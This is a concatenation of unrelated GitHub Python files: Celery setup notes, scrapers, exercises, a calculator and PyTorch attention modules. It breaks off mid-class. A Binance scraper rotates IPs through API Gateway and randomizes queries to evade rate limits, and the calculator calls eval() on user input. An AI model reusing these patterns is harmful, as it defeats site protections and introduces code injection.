time\n\njs = logging.getLogger('js')\ntf = logging.getLogger('tf')\nstash = logging.getLogger('logstash')\n\n\nclass TestCelery(View):\n\n def get(self, request, *args, **kwargs):\n h2 = tasks.sub.delay(23, 100)\n\n js.error('test error')\n tf.error('test error')\n stash.error('test error')\n\n # print(h2)\n # print(h2.wait()) gets the return value, but that waits for celery to finish, so the async benefit is lost\n # h2 = tasks.sub.apply_async(queue='low_priority', args=(10, 50))\n # h2 = tasks.sub.apply_async(queue='high_priority', kwargs={'a': 10, 'b': 5})\n task_id = h2.task_id\n return JsonResponse(data={'task_id': task_id}, status=200)\n\nclass Te(View):\n\n def get(self, request, *args, **kwargs):\n\n js.error(f'test error-{time.time()}')\n tf.error('test error')\n stash.error('test error')\n return 
JsonResponse(data={'task_id': 2}, status=200)\n\n\n\n\"\"\"\nfrom celery.result import AsyncResult\nres=AsyncResult(\"62051878-ca77-4895-a61f-6f9525681347\") # the argument is the task id\nresult = res.result # fetch the async return value via the task_id\nres.status is the run state\nres.traceback is the traceback of any exception raised during the run\n\n\n\ncd into the directory containing manage.py\n$ pip install -r requirements.txt\n$ ./manage.py makemigrations\n$ ./manage.py migrate\n$ python3 -m celery -A core.celery worker --loglevel INFO (use -P eventlet on Windows) \n$ python3 -m celery -A core.celery beat --loglevel INFO # You need to run on other terminal.\n$ ./manage.py shell\n$ python3 -m celery purge -Q [queue_name] empty a queue\n\"\"\"\n\n##########\n\n\"\"\"\nStarting workers and beat with celery+supervisor\nOnly the command inside the celery.ini config file needs to be changed\n\nConfigure celery.ini\nroot@StarMeow-Svr:~/django-web# cd Supervisor/\n(Supervisor) root@StarMeow-Svr:~/django-web/Supervisor# ls\ncelery.ini supervisord.conf\n(Supervisor) root@StarMeow-Svr:~/django-web/Supervisor# vim celery.ini\ncelery.ini\n\n# Configuration contents \n[program:celery] \n# absolute path of the celery command \ncommand=/root/.pyenv/versions/StarMeow/bin/celery -A StarMeow worker -B -l info \n# project path \ndirectory=/root/django-web/StarMeow \n# log file path \nstdout_logfile=/var/log/myweb/celery.log \n# restart automatically \nautorestart=true \n# if true, the process sends stderr to supervisord's stdout file descriptor \nredirect_stderr=true \nReload\nSince an auto-reload script was configured earlier, just run it\n\n(Supervisor) root@StarMeow-Svr:~/django-web/Supervisor# cd ..\nroot@StarMeow-Svr:~/django-web# ./SvReload.sh \nUpdating Supervisor configuration...\nRestarted supervisord\n\nCheck the celery log\nroot@StarMeow-Svr:~/django-web# cat /var/log/myweb/celery.log\n\n\n# daemonize\ncelery multi start w1 -A celery_tasks.main -l info --logfile=./celerylog.log\n# to stop/restart, change start to stop / restart\nAnother way to daemonize is supervisor, a process-management tool; with this launch style supervisor takes over celery\n\n\npip install django-celery-results  # stores the results of celery runs\n1. configure settings.py and register the app\n\nINSTALLED_APPS = (\n ...,\n 'django_celery_results',\n)\n2. change the backend setting from redis to django-db\n\n#CELERY_RESULT_BACKEND = 'redis://10.1.210.69:6379/0' # BACKEND setting, here using redis\n\nCELERY_RESULT_BACKEND = 'django-db' # use the django ORM as result storage\n3. migrate the database\n\npython3 manage.py migrate django_celery_results\n\n\n\napply_async supports concurrency, which is its strength\n\n# -c: number of concurrent worker threads; start several queues\n(venv) $ celery -A proj worker -l info -Q default -c 2\n(venv) $ celery -A proj worker -l info -Q low_priority -c 1\n(venv) $ celery -A proj worker -l info -Q high_priority -c 4\nSet lower/upper bounds for the concurrency pool\n\n(venv) $ celery -A proj worker -l info -Q default --autoscale 4,2\n(venv) $ celery -A proj worker -l info -Q low_priority --autoscale 2,1\n(venv) $ celery -A proj worker -l info -Q high_priority --autoscale 8,4\nKeep the concurrency close to the number of CPU cores. With a 4-core server the maximum concurrency should be 4; larger numbers work but efficiency drops\n\nTasks can run in many separate queues, though putting everything in a single queue can be simpler.\n\nTo avoid plain FIFO within a single queue, give each task a priority, an integer in the range 0-9.\nadd.apply_async(queue='high_priority', priority=0, kwargs={'a': 10, 'b': 5})\nadd.apply_async(queue='high_priority', priority=5, kwargs={'a': 10, 'b': 5})\nadd.apply_async(queue='high_priority', priority=9, kwargs={'a': 10, 'b': 5})\n\nRoute different app tasks to different queues\nCELERY_QUEUES = (\nQueue(\"default\",Exchange(\"default\"),routing_key=\"default\"),\nQueue(\"for_task_A\",Exchange(\"for_task_A\"),routing_key=\"for_task_A\"),\nQueue(\"for_task_B\",Exchange(\"for_task_B\"),routing_key=\"for_task_B\") \n)\n\nCELERY_ROUTES = {\n'tasks.taskA':{\"queue\":\"for_task_A\",\"routing_key\":\"for_task_A\"},\n'tasks.taskB':{\"queue\":\"for_task_B\",\"routing_key\":\"for_task_B\"}\n}\nThen start a worker pinned to a task queue\n\ncelery -A tasks worker -l info -n workerA.%h -Q for_task_A\n\n\nDifference between time_limit and soft_time_limit\n\ntime_limit : on timeout, the child process executing the task is killed with signal 9 (SIGKILL); state: \"status\": \"FAILURE\". The worker running the task is killed outright and an error shows up in the log
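# --- Editor's aside (hedged sketch): a compact version of the AsyncResult and
# scheduling notes above; the task name `some_task` is illustrative only.
from celery.result import AsyncResult
from datetime import datetime, timedelta, timezone

def wait_for(task_id, app, timeout=30):
    res = AsyncResult(task_id, app=app)  # bind to your Celery app instance
    print(res.status)                    # PENDING / STARTED / SUCCESS / FAILURE
    return res.get(timeout=timeout)      # blocks; raises on failure or timeout

eta_utc = datetime.now(timezone.utc) + timedelta(hours=1)
# some_task.apply_async(args=[1], eta=eta_utc)     # absolute UTC time
# some_task.apply_async(args=[1], countdown=3600)  # relative seconds, no tz math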
soft_time_limit : on timeout an exception, SoftTimeLimitExceeded, can be caught; state: \"status\": \"SUCCESS\"\nCurrently this is only effective on the linux operating system\n\nhandler_upload_data.apply_async((full_path,), soft_time_limit=10)\nhandler_upload_data.apply_async((full_path,), time_limit=10)\n\nScheduling a celery task for a specific execution time\nimport datetime\n \n \ndef in_run_time(start, end):\n\n Lets a task decide whether it is inside its executable window, or needs to be handed to the scheduler\n Args:\n start: time the task starts executing, formatted like \"00:00:00\"\n end: time the task stops executing, formatted like \"07:00:00\"\n Returns:\n \n current_date = str(datetime.datetime.now().date()) + \" \"\n start_time = datetime.datetime.strptime(current_date + start, '%Y-%m-%d %H:%M:%S')\n end_time = datetime.datetime.strptime(current_date + end, '%Y-%m-%d %H:%M:%S')\n current_date = datetime.datetime.now()\n if (start_time < current_date) and (current_date < end_time):\n return True\n else:\n return False\n \n \ndef get_nextday_run_time(start, end):\n \n From the current time and the start/end window, derive the time the task should execute.\n Args:\n start: time the task starts executing, formatted like \"00:00:00\"\n end: time the task stops executing, formatted like \"07:00:00\"\n Returns:\n \n current_date = datetime.datetime.now().date()\n end_time = datetime.datetime.strptime(str(current_date) + \" \" + end, '%Y-%m-%d %H:%M:%S')\n current_time = datetime.datetime.now()\n # if today's execution window has not passed yet, run at today's execution time; otherwise move to the next day\n if current_time > end_time:\n current_date += datetime.timedelta(days=1)\n run_time_str = str(current_date) + \" \" + start\n # execution time - Beijing time\n run_time = datetime.datetime.strptime(run_time_str, '%Y-%m-%d %H:%M:%S')\n run_time = run_time + datetime.timedelta(hours=-8)\n return run_time\n \n \ndef get_run_time_by_bj_time(bj_time):\n \n Convert a time-format string into a datetime\n Args:\n bj_time: the requested execution time, type-str, e.g. \"2019-08-21 13:21:00\"\n Returns:\n \n run_time = datetime.datetime.strptime(bj_time, '%Y-%m-%d %H:%M:%S')\n run_time = run_time + datetime.timedelta(hours=-8)\n return run_time\n \nstart = \"00:00:00\"\nend = \"07:00:00\"\nwork.apply_async(args=[scan_data], eta=get_nextday_run_time(start, end), \n queue=\"queue name; remove the argument if there is none\", routing_key=\"queue key; remove the argument if there is none\")\n\"\"\"\n","repo_name":"hvag-ab/dispatch","sub_path":"djcelery/orders/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7807,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"23473436927","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom pymongo import MongoClient\nclient = MongoClient('localhost', 27017)\ndb = client.dbsparta\n\nheaders = {'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'}\ndata = requests.get('https://movie.naver.com/movie/sdb/rank/rmovie.nhn?sel=pnt&date=20200303',headers=headers)\n\nsoup = BeautifulSoup(data.text, 'html.parser')\ntr_tag= soup.select('#old_content > table > tbody > tr')\nfor tr in tr_tag:\n\n rank = tr.select_one('#old_content > table > tbody > tr > td:nth-child(1) >img ')\n\n title= tr.select_one('#old_content > table > tbody > tr > td.title > div > a')\n star = tr.select_one('#old_content > table > tbody > tr > td.point')\n if title is not None:\n doc = {'rank':rank['alt'], 'name' : title.text , 'star' :star.text}\n db.movies.insert_one(doc)","repo_name":"jtheeeeee/scc_prac","sub_path":"sparta/pythonprec/hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
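# --- Editor's aside (hedged sketch): the Naver scraper above leans on
# select()/select_one() CSS queries; the same pattern on a tiny inline
# document, with no network access needed:
from bs4 import BeautifulSoup

html = '''<table><tbody><tr>
<td><img alt="1"></td>
<td class="title"><div><a>Movie A</a></div></td>
<td class="point">9.5</td>
</tr></tbody></table>'''
soup = BeautifulSoup(html, 'html.parser')
for tr in soup.select('table > tbody > tr'):
    rank = tr.select_one('img')
    title = tr.select_one('td.title a')
    star = tr.select_one('td.point')
    if title is not None:
        print({'rank': rank['alt'], 'name': title.text, 'star': star.text})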
+{"seq_id":"10916089333","text":"# Write a program that reads the name of a city and says whether\n# or not it starts with the name \"SANTO\"\n\ncity = str(input('Enter the name of a city: ')).strip().upper()\nreturnCity = city.split()\nprint('SANTO' in returnCity[0])\n\n# Or\n# city = str(input('Enter the name of a city: ')).strip()\n# print(city[:5].upper() == 'SANTO')\n\n\n\n","repo_name":"leo-allves/python-curso-em-video","sub_path":"pynthon-basico/PythonExercicios/ex024.py","file_name":"ex024.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"41966059937","text":"usrInput = input().split(\" \")\nn = int(usrInput[0])\nm = int(usrInput[1])\nsizes = []\nfor i in range(n):\n sizes.append(int(input()))\n\ncolors = []\nfor i in range(m):\n colors.append(int(input()))\n\nsizes.sort()\ncolors.sort()\n\nsizeIndex = 0\ntotal = 0 # renamed from sum to avoid shadowing the builtin\ni = 0\nwhile i < len(colors):\n if colors[i] > sizes[sizeIndex]:\n sizeIndex += 1\n else:\n total += sizes[sizeIndex] - colors[i]\n i += 1\nprint(total)","repo_name":"sonas939/CPProblems","sub_path":"Lab2/roompainting.py","file_name":"roompainting.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"911027072","text":"def a():\n antStud = int(input('How many students? Answer: '))\n antFag = int(input('How many subjects? Answer: '))\n\n for x in range(antStud):\n for y in range(antFag):\n print(\"Student \" + str(x + 1) + \" loves Subject \" + str(y + 1),end=\" ; \")\n print()\n\n#a()\n\n\ndef b():\n for x in range(24):\n for y in range(60):\n print(str(x) + \":\" + str(y))\n\n#b()\n\n\ndef c():\n for x in range(10):\n for y in range(10):\n product = (x + 1) * (y + 1) # renamed from sum: it is a product, and sum shadows the builtin\n print(product,end=\" \")\n print()\n\n#c()","repo_name":"KristofferNyvoll/ntnu","sub_path":"TDT4110_ITGK/Assignment_3/intro_nested.py","file_name":"intro_nested.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"5641744418","text":"def make_album(artist, title, num_songs=0):\n \"\"\"Build a dictionary containing information about an album.\"\"\"\n album_dict = {\n 'artist': artist.title(),\n 'title': title.title(),\n }\n if num_songs:\n album_dict['num_songs'] = num_songs\n return album_dict\n\n# Prepare the prompts.\ntitle_prompt = \"\\nWhat album are you thinking of? \"\nartist_prompt = \"Who's the artist? 
\"\n\n# Let the user know how to quit.\nprint(\"Enter 'quit' at any time to stop.\")\n\nwhile True:\n title = input(title_prompt)\n if title == 'quit':\n break\n \n artist = input(artist_prompt)\n if artist == 'quit':\n break\n\n album = make_album(artist, title)\n print(album)\n\nprint(\"\\nThanks for responding!\")\n","repo_name":"ehmatthes/pcc_3e","sub_path":"solution_files/chapter_08/user_albums.py","file_name":"user_albums.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":571,"dataset":"github-code","pt":"77"} +{"seq_id":"32395577892","text":"from server import *\nimport math\n\ndef read(inpu):\n lis = []\n for x in inpu:\n if x == \"C\":\n if len(lis) != 0:\n del lis[len(lis)-1]\n elif x == \"CE\":\n del lis[:]\n else:\n lis.append(x)\n return lis\n\ndef show(inpu):\n string = \"\"\n for x in inpu:\n string += str(x)\n return string\n \ndef intep(inpu):\n string = \"\"\n for x in inpu:\n if x == \"sin(\":\n string += \"math.sin(\"\n elif x == \"cos(\":\n string += \"math.cos(\"\n elif x == \"tan(\":\n string += \"math.tan(\"\n elif x == \"sqrt(\":\n string += \"math.sqrt(\"\n elif x == \"log(\":\n string += \"math.log(\"\n else:\n string += str(x)\n return string\n \ndef displa(x):\n display = \"\"\n global n\n global user_input\n global ans\n if (x == \"+\" or x == \"-\" or x == \"*\" or x == \"/\") and history[0] == []:\n n = 0\n user_input.append(ans)\n user_input.append(x)\n history[n] = user_input\n do = read(user_input)\n display = show(do)\n elif x == \"=\" and user_input != []:\n for i in range(len(history)-1, 0, -1):\n history[i] = history[i-1][:]\n del history[0][:]\n do = read(history[1])\n display = intep(do)\n try:\n ans = eval(display)\n display = str(ans)\n except SyntaxError:\n display += \")\"\n try:\n ans = eval(display)\n display = str(ans)\n except SyntaxError:\n display = \"syntax error\"\n except ValueError:\n display = \"math error\"\n except:\n display = \"something wrong\"\n except ValueError:\n display = \"math error\"\n except:\n display = \"something wrong\"\n\n del user_input[:]\n elif x == \"=\":\n display = ans\n elif x == \"<\":\n if n != 4 and history[n+1] != []:\n n += 1\n do = read(history[n])\n display = show(do)\n elif x == \">\":\n if n != 0:\n n -= 1\n do = read(history[n])\n display = show(do)\n else:\n n = 0\n user_input.append(x)\n history[n] = user_input\n do = read(user_input)\n display = show(do)\n return display","repo_name":"michaevelli/calculator","sub_path":"calc.py","file_name":"calc.py","file_ext":"py","file_size_in_byte":2353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"39928008223","text":"import json\nimport redis\nfrom helpers.logger import getLogger\nimport requests\nimport time\nfrom requests_ip_rotator import ApiGateway\nimport random\nimport string\n\nlogger = getLogger(__name__)\n\n\nclass BinanceAnnouncementBot:\n def __init__(self, redis_client: redis.Redis, trade_config):\n self.redis_client = redis_client\n self.domain = \"https://www.binancezh.com\"\n self.rotate_ip = trade_config[\"TRADE_OPTIONS\"][\"ROTATE_IP\"]\n\n if self.rotate_ip:\n logger.info(\"setting up gateway\")\n self.gateway = ApiGateway(self.domain)\n self.gateway.start()\n\n logger.info(\"setting up session\")\n self.session = requests.Session()\n self.session.mount(self.domain, self.gateway)\n\n def __del__(self):\n if self.rotate_ip:\n logger.info(\"Closing gateway\")\n self.gateway.shutdown()\n\n def get_last_coin(self):\n \n 
rand_page_size = random.randint(1, 200)\n letters = string.ascii_letters\n random_string = ''.join(random.choice(letters) for i in range(random.randint(10, 20)))\n random_number = random.randint(1, 99999999999999999999)\n queries = [\"type=1\", \"catalogId=48\", \"pageNo=1\", f\"pageSize={str(rand_page_size)}\", f\"rnd={str(time.time())}\",\n f\"{random_string}={str(random_number)}\"]\n random.shuffle(queries)\n URL = f\"{self.domain}/gateway-api/v1/public/cms/article/list/query\" \\\n f\"?{queries[0]}&{queries[1]}&{queries[2]}&{queries[3]}&{queries[4]}&{queries[5]}\"\n\n if self.rotate_ip:\n latest_announcement = self.session.get(URL)\n else:\n latest_announcement = requests.get(URL)\n \n latest_announcement = latest_announcement.json()\n latest_announcement = latest_announcement['data']['catalogs'][0]['articles'][0]['title']\n symbols = []\n\n if 'Binance Will List'.lower() in latest_announcement.lower():\n str_len = len(latest_announcement)\n for index in range(str_len):\n if latest_announcement[index] == '(':\n symbol = ''\n while index < str_len and latest_announcement[index+1] != ')':\n index += 1\n symbol += latest_announcement[index]\n\n redis_data = self.redis_client.hget(\n 'binance_new_listings', symbol)\n if redis_data == None:\n symbols.append(symbol)\n self.redis_client.hset(\n 'binance_new_listings', symbol, \"Listed\")\n else:\n binance_last_announcement = self.redis_client.get(\n 'binance_last_announcement')\n if binance_last_announcement == None or binance_last_announcement != latest_announcement:\n logger.info(\n f\"latest announcement from binance {latest_announcement}\")\n self.redis_client.set('binance_last_announcement', latest_announcement)\n\n return symbols\n\n def run_bot(self):\n iterations = 0\n while True:\n try:\n latest_coin = self.get_last_coin()\n iterations += 1\n\n if len(latest_coin) > 0:\n logger.info(f\"New coin(s) detected {latest_coin}\")\n self.redis_client.set(\n 'GATEIO-coin-to-trade', json.dumps(latest_coin))\n\n logger.info(f\"Running {iterations}\")\n time.sleep(3)\n except Exception as e:\n logger.error(f\"Some error occured: {e}\")\n self.redis_client.delete('binance_last_announcement')\n time.sleep(5)\n","repo_name":"vikramk9852/gate.io-trading-bot","sub_path":"bots/binance_announcement_scrapper.py","file_name":"binance_announcement_scrapper.py","file_ext":"py","file_size_in_byte":3758,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"30151770925","text":"import torch.nn as nn\nimport torch\nfrom torch.nn import init\nfrom torch.nn.parameter import Parameter\nfrom torch.nn import functional as F\nclass AtrousSeparableConvolution(nn.Module):\n \"\"\" Atrous Separable Convolution\n \"\"\"\n def __init__(self, in_channels, out_channels, kernel_size,\n stride=1, padding=0, dilation=1, bias=True):\n super(AtrousSeparableConvolution, self).__init__()\n self.body = nn.Sequential(\n # Separable Conv\n nn.Conv2d(in_channels, in_channels, kernel_size=kernel_size, stride=stride, padding=padding, dilation=dilation, bias=bias, groups=in_channels),\n # PointWise Conv\n nn.Conv2d(in_channels, out_channels, kernel_size=1, stride=1, padding=0, bias=bias),\n )\n\n self._init_weight()\n\n def forward(self, x):\n return self.body(x)\n\n def _init_weight(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight)\n elif isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\nclass 
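# --- Editor's aside (hedged sketch): AtrousSeparableConvolution above factors a
# KxK conv into depthwise + pointwise, costing roughly K*K*Cin + Cin*Cout weights
# instead of K*K*Cin*Cout. Counting parameters with the torch modules directly:
import torch.nn as nn

def n_params(m):
    return sum(p.numel() for p in m.parameters())

standard = nn.Conv2d(64, 128, kernel_size=3, padding=1, bias=False)
separable = nn.Sequential(
    nn.Conv2d(64, 64, kernel_size=3, padding=1, groups=64, bias=False),  # depthwise
    nn.Conv2d(64, 128, kernel_size=1, bias=False),                       # pointwise
)
print(n_params(standard), n_params(separable))  # 73728 vs 8768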
DoubleConvolutionLayer(nn.Module):\n \"\"\"\n The DoubleConvolutionLayer is an module extending torch Module. It is a module that contains a layer that applies\n Conv2d -> Batchnorm -> ReLU -> Conv2d -> Batchnorm -> ReLU.\n It changes the number of channels of the input but not it's size.\n \"\"\"\n def __init__(self, n_channels_input,n_middle_channel, n_channels_output):\n \"\"\"\n Initialises a DoubleConvolutionLayer object containing one layer that procedes to the operations described\n above sequentially.\n :param n_channels_input: number of channels in input\n :param n_channels_output: number of channels in output\n \"\"\"\n super(DoubleConvolutionLayer, self).__init__()\n self.double_layer = nn.Sequential(\n AtrousSeparableConvolution(in_channels=n_channels_input,out_channels=n_middle_channel,kernel_size=3,stride=1, padding=1, dilation=1, bias=True),\n #nn.Conv2d(n_channels_input, n_channels_output, kernel_size=3, padding=1),\n nn.BatchNorm2d(n_middle_channel),\n nn.ReLU(inplace=True),\n nn.Dropout2d(p=0.05),\n AtrousSeparableConvolution(in_channels=n_middle_channel, out_channels=n_channels_output,kernel_size=3,stride=1, padding=1, dilation=1, bias=True),\n #nn.Conv2d(n_channels_output, n_channels_output, kernel_size=3, padding=1),\n nn.BatchNorm2d(n_channels_output),\n nn.ReLU(inplace=True),\n nn.Dropout2d(p=0.05)\n )\n\n\n def forward(self, x):\n \"\"\"\n Defines the flow of data in the DoubleConvolution object.\n :param x: the input data given through the layer with n_channels_input channels\n :return: x after passing through the layer with now n_channels_output channels.\n \"\"\"\n x = self.double_layer(x)\n return x\nclass conv_block_nested(nn.Module):\n def __init__(self, in_ch, mid_ch, out_ch):\n super(conv_block_nested, self).__init__()\n self.activation = nn.ReLU(inplace=True)\n self.conv1 = nn.Conv2d(in_ch, mid_ch, kernel_size=3, padding=1, bias=True)\n self.bn1 = nn.BatchNorm2d(mid_ch)\n self.conv2 = nn.Conv2d(mid_ch, out_ch, kernel_size=3, padding=1, bias=True)\n self.bn2 = nn.BatchNorm2d(out_ch)\n self.ca = ChannelAttention(out_ch, ratio=8)\n\n def forward(self, x):\n x = self.conv1(x)\n identity = x\n x = self.bn1(x)\n x = self.activation(x)\n x = self.conv2(x)\n x = self.bn2(x)\n output = self.activation(x + identity)\n # output = self.ca(output)*output+output\n return output\n\n\n\nclass up(nn.Module):\n def __init__(self, in_ch, bilinear=False):\n super(up, self).__init__()\n\n if bilinear:\n self.up = nn.Upsample(scale_factor=2,mode='bilinear', align_corners=True)\n else:\n self.up = nn.ConvTranspose2d(in_ch, in_ch, 2, stride=2)\n\n def forward(self, x):\n\n x = self.up(x)\n return x\nclass eca_layer(nn.Module):\n \"\"\"Constructs a ECA module.\n Args:\n channel: Number of channels of the input feature map\n k_size: Adaptive selection of kernel size\n \"\"\"\n def __init__(self, channel, k_size=3):\n super(eca_layer, self).__init__()\n self.avg_pool = nn.AdaptiveAvgPool2d(1)\n self.conv = nn.Conv1d(1, 1, kernel_size=k_size, padding=(k_size - 1) // 2, bias=False)\n self.sigmoid = nn.Sigmoid()\n\n def forward(self, x):\n # feature descriptor on the global spatial information\n y = self.avg_pool(x)\n\n # Two different branches of ECA module\n y = self.conv(y.squeeze(-1).transpose(-1, -2)).transpose(-1, -2).unsqueeze(-1)\n\n # Multi-scale information fusion\n y = self.sigmoid(y)\n\n return x * y.expand_as(x)\nclass ExternalAttention(nn.Module):\n def __init__(self, d_model,S=64):\n super().__init__()\n self.mk=nn.Linear(d_model,S,bias=False)\n 
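# --- Editor's aside (hedged sketch): eca_layer above squeezes the input to
# (B, C, 1, 1), runs a 1-D conv across the channel axis and rescales the input,
# so its output shape equals its input shape. A shape check, assuming the class
# defined above is in scope (channel count is illustrative):
import torch

eca = eca_layer(channel=64, k_size=3)
x = torch.randn(2, 64, 32, 32)
assert eca(x).shape == x.shape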
self.mv=nn.Linear(S,d_model,bias=False)\n self.softmax=nn.Softmax(dim=1)\n self.init_weights()\n def init_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n init.kaiming_normal_(m.weight, mode='fan_out')\n if m.bias is not None:\n init.constant_(m.bias, 0)\n elif isinstance(m, nn.BatchNorm2d):\n init.constant_(m.weight, 1)\n init.constant_(m.bias, 0)\n elif isinstance(m, nn.Linear):\n init.normal_(m.weight, std=0.001)\n if m.bias is not None:\n init.constant_(m.bias, 0)\n\n def forward(self, queries):\n attn=self.mk(queries) #bs,n,S\n attn=self.softmax(attn) #bs,n,S\n attn=attn/torch.sum(attn,dim=2,keepdim=True) #bs,n,S\n out=self.mv(attn) #bs,n,d_model\n\n return out\n\nclass AdaptiveFF(nn.Module):\n def __init__(self, in_channels,ratio = 4):\n super(AdaptiveFF, self).__init__()\n self.avg_pool = nn.AdaptiveAvgPool2d((1,1))\n\n self.fc1 = nn.Conv2d(in_channels,in_channels//ratio,1,bias=False)\n self.relu1 = nn.ReLU()\n self.fc2 = nn.Conv2d(in_channels//ratio, in_channels,1,bias=False)\n self.sigmod = nn.Sigmoid()\n\n def forward(self,x):\n avg_out = self.fc2(self.relu1(self.fc1(self.avg_pool(x))))\n out = self.sigmod(avg_out)\n out = out*x\n return out\n\nclass ChannelAttention(nn.Module):\n def __init__(self, in_channels, ratio = 16):\n super(ChannelAttention, self).__init__()\n self.avg_pool = nn.AdaptiveAvgPool2d(1)\n self.max_pool = nn.AdaptiveMaxPool2d(1)\n self.fc1 = nn.Conv2d(in_channels,in_channels//ratio,1,bias=False)\n self.relu1 = nn.ReLU()\n self.fc2 = nn.Conv2d(in_channels//ratio, in_channels,1,bias=False)\n self.sigmod = nn.Sigmoid()\n def forward(self,x):\n avg_out = self.fc2(self.relu1(self.fc1(self.avg_pool(x))))\n max_out = self.fc2(self.relu1(self.fc1(self.max_pool(x))))\n out = avg_out + max_out\n return self.sigmod(out)\n\nclass Adaptive_ChannelAttention(nn.Module):\n def __init__(self, in_channels, S = 16 ,r = 8):\n super(Adaptive_ChannelAttention, self).__init__()\n self.avg_pool = nn.AdaptiveAvgPool2d(1)\n self.max_pool = nn.AdaptiveMaxPool2d(1)\n self.fc1 = nn.Conv2d(in_channels,in_channels//r,1,bias=False)\n self.relu1 = nn.ReLU()\n self.fc2 = nn.Conv2d(in_channels//r, in_channels,1,bias=False)\n self.fc3 = nn.Conv2d(in_channels*2, in_channels // S, 1, bias=False)\n self.fc4 = nn.Conv2d(in_channels//S, 2,1,bias=False)\n self.sigmod = nn.Sigmoid()\n self.softmax = nn.Softmax()\n def forward(self,x):\n avg_out = self.sigmod(self.fc2(self.relu1(self.fc1(self.avg_pool(x)))))\n max_out = self.sigmod(self.fc2(self.relu1(self.fc1(self.max_pool(x)))))\n out1 = torch.cat([avg_out, max_out], 3)\n out2 = torch.cat([avg_out, max_out], 1)\n\n DA = self.softmax(self.fc4(self.relu1(self.fc3(out2))))\n DA = DA.permute(0,2,3,1)\n out1 = out1.permute(0,2,3,1)\n out =torch.matmul(DA,out1)\n out = out.permute(0,3,1,2)\n return out\n\nclass SpatialAttention(nn.Module):\n def __init__(self):\n super(SpatialAttention,self).__init__()\n self.conv1 = nn.Conv2d(2,1,7,padding=3,bias=False)\n self.sigmoid = nn.Sigmoid()\n def forward(self, x):\n avg_out = torch.mean(x,dim=1,keepdim=True)\n max_out = torch.max(x,dim=1,keepdim=True,out=None)[0]\n\n x = torch.cat([avg_out,max_out],dim=1)\n x = self.conv1(x)\n return self.sigmoid(x)\n\nclass Attention_Embedding(nn.Module):\n def __init__(self, in_channels, out_channels, reduction=16, pool_window=6, add_input=False):\n super(Attention_Embedding, self).__init__()\n self.add_input = add_input\n self.avg_pool = nn.AdaptiveAvgPool2d(1)\n self.max_pool = nn.AdaptiveMaxPool2d(1)\n self.SE = nn.Sequential(\n 
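# --- Editor's aside (hedged sketch): ChannelAttention and SpatialAttention above
# return gating maps rather than gated features, so the caller multiplies; the
# usual CBAM ordering is channel first, then spatial. Assuming the classes above
# are in scope:
import torch

x = torch.randn(2, 64, 32, 32)
ca = ChannelAttention(64, ratio=16)
sa = SpatialAttention()
x = ca(x) * x  # (B, C, 1, 1) gate broadcast over H, W
x = sa(x) * x  # (B, 1, H, W) gate broadcast over channels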
#nn.AvgPool2d(kernel_size=pool_window + 1, stride=1, padding=pool_window // 2),\n nn.Conv2d(in_channels*2, in_channels*2 // reduction, 1),\n nn.BatchNorm2d(in_channels*2 // reduction, momentum=0.95),\n nn.ReLU(inplace=False),\n nn.Conv2d(in_channels*2 // reduction, out_channels, 1),\n nn.Sigmoid())\n\n def forward(self, high_feat, low_feat):\n b, c, h, w = low_feat.size()\n avg_out = self.avg_pool(high_feat)\n max_out = self.max_pool(high_feat)\n high_feat = torch.cat([avg_out, max_out], dim=1)\n A = self.SE(high_feat)\n A = F.upsample(A, (h, w), mode='bilinear')\n\n output = low_feat * A\n if self.add_input:\n output += low_feat\n\n return output\n\nclass SNUNet_ECAM(nn.Module):\n # SNUNet-CD with ECAM\n def __init__(self, in_ch=3, out_ch=2):\n super(SNUNet_ECAM, self).__init__()\n torch.nn.Module.dump_patches = True\n n1 = 32 # the initial number of channels of feature map\n filters = [n1, n1 * 2, n1 * 4, n1 * 8, n1 * 16]\n\n self.pool = nn.MaxPool2d(kernel_size=2, stride=2)\n\n self.conv0_0 = conv_block_nested(in_ch, filters[0], filters[0])\n self.conv1_0 = conv_block_nested(filters[0], filters[1], filters[1])\n self.conv2_0 = conv_block_nested(filters[1], filters[2], filters[2])\n self.conv3_0 = conv_block_nested(filters[2], filters[3], filters[3])\n self.conv4_0 = conv_block_nested(filters[3], filters[4], filters[4])\n\n self.conv0_1 = conv_block_nested(filters[0] * 2 + filters[1], filters[0], filters[0])\n self.AE0_1 = Attention_Embedding(filters[1] * 2, filters[0]*2)\n self.conv1_1 = conv_block_nested(filters[1] * 2 + filters[2], filters[1], filters[1])\n self.AE1_1 = Attention_Embedding(filters[2] * 2, filters[1] * 2)\n self.conv2_1 = conv_block_nested(filters[2] * 2 + filters[3], filters[2], filters[2])\n self.AE2_1 = Attention_Embedding(filters[3] * 2, filters[2] * 2)\n self.conv3_1 = conv_block_nested(filters[3] * 2 + filters[4], filters[3], filters[3])\n self.AE3_1 = Attention_Embedding(filters[4] * 2, filters[3] * 2)\n\n self.conv0_2 = conv_block_nested(filters[0] * 3 + filters[1], filters[0], filters[0])\n self.AE0_2 = Attention_Embedding(filters[1], filters[0] * 3 )\n self.conv1_2 = conv_block_nested(filters[1] * 3 + filters[2], filters[1], filters[1])\n self.AE1_2 = Attention_Embedding( 